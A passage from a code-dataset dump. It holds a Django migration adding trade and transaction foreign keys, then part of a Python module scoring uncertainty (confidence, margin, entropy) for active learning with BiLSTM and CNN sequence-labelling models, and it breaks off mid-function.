hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c5cf54b8bda6147f293a44fdca91bd99c874cc46 | 3,374 | py | Python | django/currencies/migrations/0002_initial.py | AngelOnFira/megagame-controller | 033fec84babf80ffd0868a0f7d946ac4c18b061c | [
"MIT"
] | null | null | null | django/currencies/migrations/0002_initial.py | AngelOnFira/megagame-controller | 033fec84babf80ffd0868a0f7d946ac4c18b061c | [
"MIT"
] | 1 | 2022-03-03T21:56:12.000Z | 2022-03-03T21:56:12.000Z | django/currencies/migrations/0002_initial.py | AngelOnFira/megagame-controller | 033fec84babf80ffd0868a0f7d946ac4c18b061c | [
"MIT"
] | null | null | null | # Generated by Django 3.2.8 on 2021-11-20 23:06
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
("teams", "0001_initial"),
("players", "0001_initial"),
("discord_models", "0001_initial"),
("currencies", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="transaction",
name="initiating_player",
field=models.ForeignKey(
blank=True,
default=None,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="transaction",
to="players.player",
),
),
migrations.AddField(
model_name="transaction",
name="to_wallet",
field=models.ForeignKey(
blank=True,
default=None,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="debits",
to="currencies.wallet",
),
),
migrations.AddField(
model_name="trade",
name="discord_guild",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
to="discord_models.guild",
),
),
migrations.AddField(
model_name="trade",
name="initiating_party",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="initiated_trades",
to="teams.team",
),
),
migrations.AddField(
model_name="trade",
name="initiating_party_discord_trade_thread",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="initiating_discord_trade_thread",
to="discord_models.channel",
),
),
migrations.AddField(
model_name="trade",
name="receiving_party",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="receiving_trades",
to="teams.team",
),
),
migrations.AddField(
model_name="trade",
name="receiving_party_discord_trade_thread",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="receiving_discord_trade_thread",
to="discord_models.channel",
),
),
migrations.AddField(
model_name="trade",
name="transactions",
field=models.ManyToManyField(to="currencies.Transaction"),
),
migrations.AddField(
model_name="payment",
name="transactions",
field=models.ManyToManyField(to="currencies.Transaction"),
),
]
| 31.240741 | 70 | 0.508595 | 284 | 3,374 | 5.862676 | 0.207746 | 0.043243 | 0.124324 | 0.145946 | 0.75976 | 0.75976 | 0.687688 | 0.687688 | 0.567568 | 0.567568 | 0 | 0.015019 | 0.388263 | 3,374 | 107 | 71 | 31.53271 | 0.791667 | 0.013337 | 0 | 0.71 | 1 | 0 | 0.174031 | 0.066727 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02 | 0 | 0.06 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
c5e3cb7db018a404603f3f76dc6f607c3dc8a323 | 47,691 | py | Python | code/active.py | tarmeens/active-deep-parsing | 77a511e2b3f5f74cb911061797b020bd5c846570 | [
"MIT"
] | 2 | 2018-06-20T16:10:52.000Z | 2018-07-16T21:03:47.000Z | code/active.py | tarmeens/active-deep-parsing | 77a511e2b3f5f74cb911061797b020bd5c846570 | [
"MIT"
] | null | null | null | code/active.py | tarmeens/active-deep-parsing | 77a511e2b3f5f74cb911061797b020bd5c846570 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
DHLAB - IC - EPFL
This file contains functions for uncertainty sampling active learning.
Important note for fist-time users: this file is an extension of models.py and utils.py. Please check them out first!
author: Mattia Martinelli
date: 08/06/2018
"""
# Modules
import os
import random
import numpy as np
import tensorflow
# Keras function
from keras.callbacks import EarlyStopping
from keras.layers import Embedding, LSTM, Dense, Bidirectional, Dropout, Input, TimeDistributed, Flatten, Convolution1D, MaxPooling1D, concatenate
from keras.models import Sequential, Model
from keras.optimizers import Adam, RMSprop
from keras_contrib.utils import save_load_utils
from models import *
from utils import *
from scipy.stats import rankdata
import scipy as sc
from shutil import copyfile
import operator
from collections import defaultdict
import time
def BiLSTM_score(filename, X_w, X_i, y, word2ind, maxWords, ind2label,
word_embeddings=True, pretrained_embedding="", word_embedding_size=100,
maxChar=0, char_embedding_type="", char2ind="", char_embedding_size=50,
lstm_hidden=32, dropout=0.5, optimizer='rmsprop',
train = False, X_train = None, y_train = None, X_test = None, y_test = None,
nbr_epochs = 1, batch_size=128, early_stopping_patience=-1,
folder_path="BiLSTM_results", score_name = "uncertainty_scores", print_to_file = True
):
"""
The function computes, for each input token, three uncertainty sampling scores: probability, margin, entropy.
Scores are generated with the BiLSTM model. Softmax is the prediction function.
Detailed information about how scores are computed can be found in the report.
The underlying model can be trained. Otherwise it uses the weights in "folder_path/filename/filename.h5".
The result is stored in a csv file, structured with the following columns:
"Sequence", "Position", "Token", "Target", "Predicted", "Posterior", "Confidence", "Margin", "Entropy", "Reference"
where:
- Sequence is the reference index in the dataset (0 first reference, 1 second reference, ...)
- Position is the index of the token in the reference, i.e. the index in the reference (0 first token, 1 second token, ...)
- Token is the token.
- Target is the real label of the token.
- Predicted is the actual prediction on the token.
- Posterior is the output probability of prediction.
- Confidence is the confidence (i.e. posterior) ranking over all tokens.
- Margin is the margin raking over all tokens.
- Entropy is the entropy ranking over all tokens.
- Reference is the full reference to which the token belongs as a string.
Example:
"Sequence", "Position", "Token", "Target", "Predicted", "Posterior", "Confidence", "Margin", "Entropy", "Reference"
4 0 Maria Author Author 99.4 10 9 11 "Maria and ..."
:param filename: File to redirect the printing.
:param X_w: Data to score, given in the original word format of load_data function (in utils.py).
:param X_i: Data to score, given in the indexed format of encodePadData_x function (in utils.py).
:param y: Labels of the data to score, given in the original word format of load_data function (in utils.py).
:param folder_path: Path to the directory storing all to-be-generated files and folders.
:param print_to_file: if True redirects the printings to a file (given in filename), if False std_out is kept
:param score_name: Name of the file with the scores.
:see Please for the other parameters refer to BiLSTM_model function in models.py (identical parameters are named the same).
:return void
"""
# Where model weights will be stored
filepath = folder_path+"/"+filename+"/"+filename
best_model_weights_path = "{0}.h5".format(filepath)
# Get compiled model with input parameters, if needed it can be trained too
model = BiLSTM_model( filename = filename, train = train, output = "softmax",
X_train = X_train, X_test= X_test, word2ind = word2ind, maxWords = maxWords,
y_train = y_train, y_test = y_test, ind2label = ind2label,
validation = False, X_valid = None, y_valid = None,
word_embeddings = word_embeddings, pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size,
maxChar = maxChar, char_embedding_type = char_embedding_type, char2ind = char2ind, char_embedding_size = char_embedding_size,
lstm_hidden = lstm_hidden, batch_size = batch_size, dropout = dropout, optimizer = optimizer,
nbr_epochs = nbr_epochs, early_stopping_patience = early_stopping_patience,
folder_path = folder_path, gen_confusion_matrix = False, return_model = True, print_to_file = print_to_file
)
# HACK: optmizer weight length issue
# https://github.com/keras-team/keras/issues/4044
import h5py
with h5py.File(best_model_weights_path, 'a') as f:
if 'optimizer_weights' in f.keys():
del f['optimizer_weights']
save_load_utils.load_all_weights(model, best_model_weights_path)
# Compute predictions and uncertainty scores
probs = model.predict(X_i)
probs = np.asarray(probs)
# Arguments of sorted values in ascending order
pred_sort_index = np.argsort(probs)
# Reverse the one-hot encoding
#true_index = np.argsort(y_target)[:,:,-1]
true_index = np.argmax(y, axis=-1)
# Predict probability of best prediction
pred_index = pred_sort_index[:,:,-1]
grid = np.indices((pred_index.shape[0], pred_index.shape[1]))
pred_prob = probs[grid[0],grid[1],pred_index[grid[0],grid[1]]]
# Predict probability of second best prediction
pred_2_index = pred_sort_index[:,:,-2]
grid = np.indices((pred_2_index.shape[0], pred_2_index.shape[1]))
pred_2_prob = probs[grid[0],grid[1],pred_2_index[grid[0],grid[1]]]
# Margin score, computed as the difference between the best prediction
# and the second best prediction
pred_margin = pred_prob - pred_2_prob
# Entropy score, compute as entropy over all prediction probabilities ù
# The entropy score is inversed to compute rank later
pred_entropy = np.sum(np.multiply(probs,np.log(probs)), axis = -1)
# Index 0 in the predictions referes to padding
ind2labelNew = ind2label[0].copy()
ind2labelNew.update({0: "null"})
# Compute the labels for each prediction
pred_label = [[ind2labelNew[x] for x in a] for a in pred_index]
true_label = [[ind2labelNew[x] for x in b] for b in true_index]
# Flatten to uniform with ranking
pred_flat = np.ravel(pred_label)
true_flat = np.ravel(true_label)
prob_flat = np.ravel(pred_prob)
# Compute ranking
prob_rank = rankdata(pred_prob, method='min')
margin_rank = rankdata(pred_margin, method='min')
entropy_rank = rankdata(pred_entropy, method='min')
# Fill CSV rows
rows = []
seq_len = maxWords
for i, seq in enumerate(X_w):
# skip first sequence
if i == 0:
continue
seq_offset = i*maxWords + seq_len - len(seq)
for j,w in enumerate(seq):
index = seq_offset + j
rows.append(
(i, j + 1, w, true_flat[index], pred_flat[index],
round(prob_flat[index], 4), prob_rank[index],
margin_rank[index], entropy_rank[index],
" ".join(str(s) for s in seq))
)
# Write results on CSV file
columns = ("Sequence", "Position", "Token", "Target", "Predicted", "Posterior",
"Confidence", "Margin", "Entropy", "Reference")
# Store scores
filename="score"
os.makedirs(folder_path+"/"+filename, exist_ok=True)
score_result_path = folder_path+"/"+filename+"/"+score_name
write_to_csv(score_result_path, columns, rows)
print("BiLSTM score has terminated!")
def CNN_score(filename, X_w, X_i, y, word2ind, maxWords, ind2label, maxChar, char2ind,
pretrained_embedding="", word_embedding_size=100,
char_embedding_size=50, lstm_hidden=32, dropout=0.5, optimizer='rmsprop',
folder_path="CNN_results", score_name = "scores", print_to_file = True,
train = False, X_train = None, y_train = None, X_test = None, y_test = None,
nbr_epochs = 5, batch_size=128, early_stopping_patience=-1):
"""
The function computes, for each input token, three uncertainty sampling scores: probability, margin, entropy.
Scores are generated with the CNN-CNN-LSTM model.
Detailed information about how scores are computed can be found in the report.
The underlying model can be trained. Otherwise it uses the weights in "folder_path/filename/filename.h5".
The result is stored in a csv file. For additional information on the output file, please refer to the BiLSTM_score function description.
:param filename: File to redirect the printing.
:param X_w: Data to score, given in the original word format of load_data function (in utils.py).
:param X_i: Data to score, given in the indexed format of encodePadData_x function (in utils.py).
:param y: Labels of the data to score, given in the original word format of load_data function (in utils.py).
:param folder_path: Path to the directory storing all to-be-generated files and folders.
:param score_name: Name of the file with the scores.
:param print_to_file: if True redirects the printings to a file (given in filename), if False std_out is kept
:see Please for the other parameters refer to BiLSTM_model function in models.py (identical parameters are named the same).
:return void
"""
# Where model weights will be stored
filepath = folder_path+"/"+filename+"/"+filename
best_model_weights_path = "{0}.h5".format(filepath)
# Get compiled model with input parameters, if needed it can be trained too
model = CNN_model(filename = filename, train = train,
X_train = X_train, X_test = X_test, y_train = y_train, y_test = y_test,
word2ind = word2ind, maxWords = maxWords, ind2label = ind2label, maxChar = maxChar, char2ind = char2ind,
validation=False, X_valid=None, y_valid=None,
pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size, char_embedding_size = char_embedding_size,
lstm_hidden = lstm_hidden, nbr_epochs = nbr_epochs, batch_size = batch_size, dropout = dropout,
optimizer= optimizer, early_stopping_patience=-1,
folder_path=folder_path, gen_confusion_matrix=False, return_model = True, print_to_file = print_to_file
)
# HACK: optmizer weight length issue
# https://github.com/keras-team/keras/issues/4044
import h5py
with h5py.File(best_model_weights_path, 'a') as f:
if 'optimizer_weights' in f.keys():
del f['optimizer_weights']
save_load_utils.load_all_weights(model, best_model_weights_path)
# Compute predictions and uncertainty scores
probs = model.predict(X_i)
probs = np.asarray(probs)
# Arguments of sorted values in ascending order
pred_sort_index = np.argsort(probs)
# Reverse the one-hot encoding
#true_index = np.argsort(y_target)[:,:,-1]
true_index = np.argmax(y, axis=-1)
# Predict probability of best prediction
pred_index = pred_sort_index[:,:,-1]
grid = np.indices((pred_index.shape[0], pred_index.shape[1]))
pred_prob = probs[grid[0],grid[1],pred_index[grid[0],grid[1]]]
# Predict probability of second best prediction
pred_2_index = pred_sort_index[:,:,-2]
grid = np.indices((pred_2_index.shape[0], pred_2_index.shape[1]))
pred_2_prob = probs[grid[0],grid[1],pred_2_index[grid[0],grid[1]]]
# Margin score, computed as the difference between the best prediction
# and the second best prediction
pred_margin = pred_prob - pred_2_prob
# Entropy score, compute as entropy over all prediction probabilities ù
# The entropy score is inversed to compute rank later
pred_entropy = np.sum(np.multiply(probs,np.log(probs)), axis = -1)
# Index 0 in the predictions referes to padding
ind2labelNew = ind2label[0].copy()
ind2labelNew.update({0: "null"})
# Compute the labels for each prediction
pred_label = [[ind2labelNew[x] for x in a] for a in pred_index]
true_label = [[ind2labelNew[x] for x in b] for b in true_index]
# Flatten to uniform with ranking
pred_flat = np.ravel(pred_label)
true_flat = np.ravel(true_label)
prob_flat = np.ravel(pred_prob)
# Compute ranking
prob_rank = rankdata(pred_prob, method='min')
margin_rank = rankdata(pred_margin, method='min')
entropy_rank = rankdata(pred_entropy, method='min')
# Create CSV rows
rows = []
seq_len = maxWords
for i, seq in enumerate(X_w):
# skip first sequence
if i == 0:
continue
seq_offset = i*maxWords + seq_len - len(seq)
for j,w in enumerate(seq):
index = seq_offset + j
rows.append(
(i, j + 1, w, true_flat[index], pred_flat[index],
round(prob_flat[index], 4), prob_rank[index],
margin_rank[index], entropy_rank[index],
" ".join(str(s) for s in seq))
)
# Write results on CSV file
columns = ("Sequence", "Position", "Token", "Target", "Predicted", "Posterior",
"Confidence", "Margin", "Entropy", "Reference")
# Store scores
filename="score"
os.makedirs(folder_path+"/"+filename, exist_ok=True)
score_result_path = folder_path+"/"+filename+"/"+score_name
write_to_csv(score_result_path, columns, rows)
print("CNN score has terminated!")
def BiLSTM_query(filename, X_w, X_i, y, numSeqToQuery, mode, word2ind, maxWords, ind2label, query_seed = 42,
write_to_disk = False, verbose= False, task = 1,
word_embeddings=True, pretrained_embedding="", word_embedding_size=100,
maxChar=0, char_embedding_type="", char2ind="", char_embedding_size=50,
lstm_hidden=32, dropout=0.5, optimizer='rmsprop',
train = False, X_train = None, y_train = None, X_test = None, y_test = None,
nbr_epochs = 1, batch_size=128, early_stopping_patience=-1,
folder_path="BiLSTM_results", print_to_file = True
):
"""
The function selects references from the dataset according to their entropy uncertainy sampling score.
Scores are generated with the BiLSTM model. Softmax is the prediction function.
Detailed information about how sequence scores are computed can be found in the report.
The underlying can be trained. Otherwise it uses the weights in "folder_path/filename/filename.h5".
:param filename: File to redirect the printing.
:param X_w: Data to score, given in the original word format of load_data function (in utils.py).
:param X_i: Data to score, given in the indexed format of encodePadData_x function (in utils.py).
:param y: Labels of the data to score, given in the original word format of load_data function (in utils.py).
:param numSeqToQuery: Number of references to query.
:param mode: How references are queried:
- least: query least confident references, i.e. highest entropy.
- most: query most confident references, i.e. lowest entropy.
- random: query references randomly.
:param query_seed: seed of the random sampling.
:param write_to_disk: if True, stores in a text file the queried references.
:param verbose: if True, and write_to_disk is True, store entropy scores and target label along with the tokens.
:param task: for which task the function is querying. Effective only if write_to_disk is True. Must be a value between 1 and 3.
:param folder_path: Path to the directory storing all to-be-generated files and folders.
:param print_to_file: if True redirects the printings to a file (given in filename), if False std_out is kept
:see Please for the other parameters refer to BiLSTM_model function in models.py (identical parameters are named the same).
:return Indices of the queried references.
"""
assert(task >= 1 and task <= 3)
# Where model weights will be stored
filepath = folder_path+"/"+filename+"/"+filename
best_model_weights_path = "{0}.h5".format(filepath)
# Get compiled model with input parameters, if needed it can be trained too
model = BiLSTM_model( filename = filename, train = train, output = "softmax",
X_train = X_train, X_test= X_test, word2ind = word2ind, maxWords = maxWords,
y_train = y_train, y_test = y_test, ind2label = ind2label,
validation = False, X_valid = None, y_valid = None,
word_embeddings = word_embeddings, pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size,
maxChar = maxChar, char_embedding_type = char_embedding_type, char2ind = char2ind, char_embedding_size = char_embedding_size,
lstm_hidden = lstm_hidden, batch_size = batch_size, dropout = dropout, optimizer = optimizer,
nbr_epochs = nbr_epochs, early_stopping_patience = early_stopping_patience,
folder_path = folder_path, gen_confusion_matrix = False, return_model = True, print_to_file = print_to_file
)
# HACK: optmizer weight length issue
# https://github.com/keras-team/keras/issues/4044
import h5py
with h5py.File(best_model_weights_path, 'a') as f:
if 'optimizer_weights' in f.keys():
del f['optimizer_weights']
save_load_utils.load_all_weights(model, best_model_weights_path)
# Compute predictions and uncertainty scores
probs = model.predict(X_i)
probs = np.asarray(probs)
# Arguments of sorted values in ascending order
pred_sort_index = np.argsort(probs)
# Reverse the one-hot encoding
#true_index = np.argsort(y_target)[:,:,-1]
true_index = np.argmax(y, axis=-1)
# Predict probability of best prediction
pred_index = pred_sort_index[:,:,-1]
grid = np.indices((pred_index.shape[0], pred_index.shape[1]))
pred_prob = probs[grid[0],grid[1],pred_index[grid[0],grid[1]]]
# Entropy score, compute as entropy over all prediction probabilities
# The entropy score is inversed to later sort the list in ascending order
pred_entropy = np.sum(np.multiply(probs,np.log(probs)), axis = -1)
# Entropy over the sequence (with no padding)
# The value is computed as the average entropy w.r.t. the tokens which are not padding
sequence_len = np.count_nonzero((X_i[0] != 0), -1)
sequence_entropy = np.divide((pred_entropy * (X_i[0] != 0)).sum(axis = -1)[1:], sequence_len[1:])
# Get indices of sorted array
sequence_entropy_sort_index = np.argsort(sequence_entropy)
# Add 1 to indices to take first line into account
add1 = np.vectorize(lambda x: x + 1)
sequence_entropy_sort_index = add1(sequence_entropy_sort_index)
# Entropy over the sequence (with padding)
# The value is computed as the sum of entropies of all tokens in the sequence
#sequence_entropy = np.sum(pred_entropy, axis = -1)
#sequence_entropy_sort_index = np.argsort(sequence_entropy)
# Index 0 in the predictions referes to padding
ind2labelNew = ind2label[0].copy()
ind2labelNew.update({0: "null"})
# Compute the labels for each prediction
pred_label = [[ind2labelNew[x] for x in a] for a in pred_index]
true_label = [[ind2labelNew[x] for x in b] for b in true_index]
# Flatten to uniform indexing
pred_flat = np.ravel(pred_label)
true_flat = np.ravel(true_label)
entropy_flat = np.ravel(pred_entropy)
seq_len = maxWords
value_to_return = None
# Get least confident (highest entropy)
if mode == "least":
query_index_least_rank = sequence_entropy_sort_index[:numSeqToQuery]
value_to_return = query_index_least_rank
filename="least.txt"
# Get most confident (lowest entropy)
if mode == "most":
query_index_most_rank = sequence_entropy_sort_index[max((len(sequence_entropy_sort_index) - numSeqToQuery),0):]
value_to_return = query_index_most_rank
filename="most.txt"
# Get random sequences
if mode == "random":
# Compute random indexing
query_index_random = np.arange(1, len(sequence_entropy_sort_index) + 1)
np.random.seed(query_seed)
np.random.shuffle(query_index_random)
query_index_random = query_index_random[:numSeqToQuery]
value_to_return = query_index_random
filename="random.txt"
# NOTE: other uncertainty sampling measures can be inserted below.
# Store sequences in a file
if write_to_disk:
os.makedirs(folder_path+"/"+"query_result", exist_ok=True)
query_result_path = folder_path+"/"+"query_result"+"/"+filename
with open(query_result_path, "w", encoding = "utf-8") as f:
if verbose:
f.write("token target predicted entropy\r\r")
else:
f.write("-DOCSTART- -X- -X- o\r\r")
# Store least index rank
for i in value_to_return:
seq = X_w[i]
seq_offset = i*maxWords + seq_len - len(seq)
for j,w in enumerate(seq):
index = seq_offset + j
if verbose:
f.write(w + " " + true_flat[index] + " " + pred_flat[index] + " " + str(entropy_flat[index]) + "\r")
else:
if task == 1:
f.write(w + " " + true_flat[index] + " o o\r")
elif task == 2:
f.write(w + " o " + true_flat[index] + " o\r")
elif task == 3:
f.write(w + " o o " + true_flat[index] + "\r")
else:
raise Exception('Bad task given.')
f.write("\r")
print("BiLSTM query has terminated!")
return value_to_return
def CNN_query(filename, X_w, X_i, y, numSeqToQuery, mode, word2ind, maxWords, ind2label, maxChar, char2ind, seed = 42,
write_to_disk = False, verbose = False, task = 1,
pretrained_embedding="", word_embedding_size=100, char_embedding_size=50,
lstm_hidden=32, dropout=0.5, optimizer='rmsprop',
train = False, X_train = None, y_train = None, X_test = None, y_test = None,
nbr_epochs = 5, batch_size=128, early_stopping_patience=-1, folder_path="CNN_results", print_to_file = True
):
"""
The function selects references from the dataset according to their entropy uncertainy sampling score.
Scores are generated with the CNN-CNN-LSTM model.
Detailed information on how sequence scores are computed can be found in the report.
The underlying model can be trained. Otherwise it uses the weights in "folder_path/filename/filename.h5".
:param filename: File to redirect the printing.
:param X_w: Data to score, given in the original word format of load_data function (in utils.py).
:param X_i: Data to score, given in the indexed format of encodePadData_x function (in utils.py).
:param y: Labels of the data to score, given in the original word format of load_data function (in utils.py).
:param numSeqToQuery: Number of references to query.
:param mode: How references are queried:
- least: query least confident references, i.e. highest entropy.
- most: query most confident references, i.e. lowest entropy.
- random: query references randomly.
- hybrid: hybrid least/most approach.
- Other methods can be added if needed.
:param query_seed: seed of the random sampling.
:param write_to_disk: if True, stores in a text file the queried references.
:param verbose: if True, and write_to_disk is True, store entropy scores and target label along with the tokens.
:param task: for which task the function is querying. Effective only if write_to_disk is True. Must be a value between 1 and 3.
:param folder_path: Path to the directory storing all to-be-generated files and folders.
:param print_to_file: if True redirects the printings to a file (given in filename), if False std_out is kept
:see Please for the other parameters refer to BiLSTM_model function in models.py (identical parameters are named the same).
:return indices of the queried references.
"""
# Where model weights will be stored
filepath = folder_path+"/"+filename+"/"+filename
best_model_weights_path = "{0}.h5".format(filepath)
# Get compiled model with input parameters, if needed it can be trained too
model = CNN_model(filename = filename, train = train,
X_train = X_train, X_test = X_test, y_train = y_train, y_test = y_test,
word2ind = word2ind, maxWords = maxWords, ind2label = ind2label, maxChar = maxChar, char2ind = char2ind,
validation=False, X_valid=None, y_valid=None,
pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size, char_embedding_size = char_embedding_size,
lstm_hidden = lstm_hidden, nbr_epochs = nbr_epochs, batch_size = batch_size, dropout = dropout,
optimizer= optimizer, early_stopping_patience=-1,
folder_path=folder_path, gen_confusion_matrix=False, return_model = True, print_to_file = print_to_file
)
# HACK: optmizer weight length issue
# https://github.com/keras-team/keras/issues/4044
import h5py
with h5py.File(best_model_weights_path, 'a') as f:
if 'optimizer_weights' in f.keys():
del f['optimizer_weights']
save_load_utils.load_all_weights(model, best_model_weights_path)
# Compute predictions and uncertainty scores
probs = model.predict(X_i)
probs = np.asarray(probs)
# Arguments of sorted values in ascending order
pred_sort_index = np.argsort(probs)
# Reverse the one-hot encoding
#true_index = np.argsort(y_target)[:,:,-1]
true_index = np.argmax(y, axis=-1)
# Predict probability of best prediction
pred_index = pred_sort_index[:,:,-1]
grid = np.indices((pred_index.shape[0], pred_index.shape[1]))
pred_prob = probs[grid[0],grid[1],pred_index[grid[0],grid[1]]]
# Entropy score, compute as entropy over all prediction probabilities
# The entropy score is inversed to sort the list later in ascending order
pred_entropy = np.sum(np.multiply(probs,np.log(probs)), axis = -1)
# Entropy over the sequence (with no padding)
# The value is computed as the average entropy w.r.t. the tokens which are not padding
sequence_len = np.count_nonzero((X_i[0] != 0), -1)
sequence_entropy = np.divide((pred_entropy * (X_i[0] != 0)).sum(axis = -1)[1:], sequence_len[1:]) # [1:] because first sequence is empty line
# Get indices of sorted array
sequence_entropy_sort_index = np.argsort(sequence_entropy)
# Add 1 to indices to take first line into account
add1 = np.vectorize(lambda x: x + 1)
sequence_entropy_sort_index = add1(sequence_entropy_sort_index)
# Entropy over the sequence (with padding)
# The value is computed as the sum of entropies of all tokens in the sequence
#sequence_entropy = np.sum(pred_entropy, axis = -1)
#sequence_entropy_sort_index = np.argsort(sequence_entropy)
# Index 0 in the predictions referes to padding
ind2labelNew = ind2label[0].copy()
ind2labelNew.update({0: "null"})
# Compute the labels for each prediction
pred_label = [[ind2labelNew[x] for x in a] for a in pred_index]
true_label = [[ind2labelNew[x] for x in b] for b in true_index]
# Flatten to uniform indexing
pred_flat = np.ravel(pred_label)
true_flat = np.ravel(true_label)
entropy_flat = np.ravel(pred_entropy)
seq_len = maxWords
if write_to_disk:
os.makedirs(folder_path+"/"+"query_result", exist_ok=True)
value_to_return = None
# Get least confident index rank
if mode == "least":
# Compute lowest rank indexing
query_index_least_rank = sequence_entropy_sort_index[:numSeqToQuery]
value_to_return = query_index_least_rank
filename="least.txt"
# Get most confident index rank
if mode == "most":
# Compute lowest and highest rank indexing
query_index_most_rank = sequence_entropy_sort_index[max((len(sequence_entropy_sort_index) - numSeqToQuery),0):]
value_to_return = query_index_most_rank
filename="most.txt"
# Get random index
if mode == "random":
# Compute random indexing
query_index_random = np.arange(1, len(sequence_entropy_sort_index) + 1)
np.random.seed(seed)
np.random.shuffle(query_index_random)
query_index_random = query_index_random[:numSeqToQuery]
value_to_return = query_index_random
